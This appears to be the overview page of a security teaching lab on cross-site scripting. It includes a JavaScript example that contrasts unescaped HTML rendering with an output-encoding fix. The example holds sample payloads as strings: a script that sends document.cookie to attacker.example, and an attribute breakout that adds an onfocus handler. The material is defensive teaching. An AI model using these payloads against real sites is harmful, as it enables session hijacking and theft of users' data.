Overview

Cross-site scripting (XSS) is a class of attack in which an attacker injects executable script into a target website so that the script later runs in victims' browsers, with the privileges of the trusted site's origin. It has been one of the most prevalent web attacks of the last decade and is listed among the OWASP Top 10 security risks of 2017 by the Open Web Application Security Project (OWASP). With XSS, an attacker can steal session identifiers or otherwise hijack a victim's session, read and modify the victim's data without consent, and redirect the victim to malicious websites. In this lab, we first demonstrate how an XSS attack works through hands-on experiments, then analyze the conditions that make it possible, and finally study countermeasures against it.
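To make the injection concrete before the hands-on part, the following is an added example (written for this page, not code from the lab materials) that models the two halves of the attack in plain JavaScript: a page that concatenates untrusted user input into HTML, and the contextual output encoding that neutralises it. The comment payload, the page templates and the function names are constructed for illustration; the cookie-stealing script is a string that is never executed here, only rendered.

```javascript
// Added example, not part of the original lab page. Models an XSS sink
// (string concatenation into HTML) and its encoded, hardened counterpart.

// Attacker-controlled input, e.g. a comment stored on the site. Constructed
// sample payload: if it reaches the page unencoded, the victim's browser
// sends its own session cookie to a host the attacker controls.
const attackerComment =
  '<script>fetch("https://attacker.example/c?" + document.cookie)</script>';

// Vulnerable rendering (HTML body context): the data is parsed as markup,
// so the browser creates a <script> element and runs it in the site origin.
function renderVulnerable(comment) {
  return '<div class="comment">' + comment + '</div>';
}

// Output encoding for the HTML body and double-quoted attribute contexts.
// Every character that can open a tag, entity or attribute is replaced by an
// entity, so the browser treats the whole value as text.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened rendering: same template, but the untrusted value is encoded
// for the context it is placed in.
function renderSafe(comment) {
  return '<div class="comment">' + escapeHtml(comment) + '</div>';
}

// Second sink, attribute context: a search box that echoes the query.
// Constructed payload closes the value attribute and adds an event handler.
const attackerQuery = '" autofocus onfocus="alert(document.cookie)';

function renderAttrVulnerable(query) {
  return '<input name="q" value="' + query + '">';
}

function renderAttrSafe(query) {
  return '<input name="q" value="' + escapeHtml(query) + '">';
}

// Crude checks used only to show the difference between the two outputs:
// whether a <script> start tag survived, and whether the attribute value was
// able to close its quotes and introduce an onfocus handler.
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

function attributeBrokenOut(html) {
  return /\s+onfocus="/i.test(html);
}

// Stand-alone run: print both renderings side by side.
if (typeof require !== 'undefined' && require.main === module) {
  console.log('vulnerable body:', renderVulnerable(attackerComment));
  console.log('safe body:     ', renderSafe(attackerComment));
  console.log('vulnerable attr:', renderAttrVulnerable(attackerQuery));
  console.log('safe attr:     ', renderAttrSafe(attackerQuery));
}
```

The same encoder is correct for both sinks here because both are HTML contexts; a value placed inside a `<script>` block, a URL, or a CSS property needs a different encoder, which is why countermeasures are usually stated as "encode for the output context" rather than "strip `<script>`".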

Conceptual Visualization

The following animation visualizes the concept of a cross-site scripting attack.

Lab Instruction Materials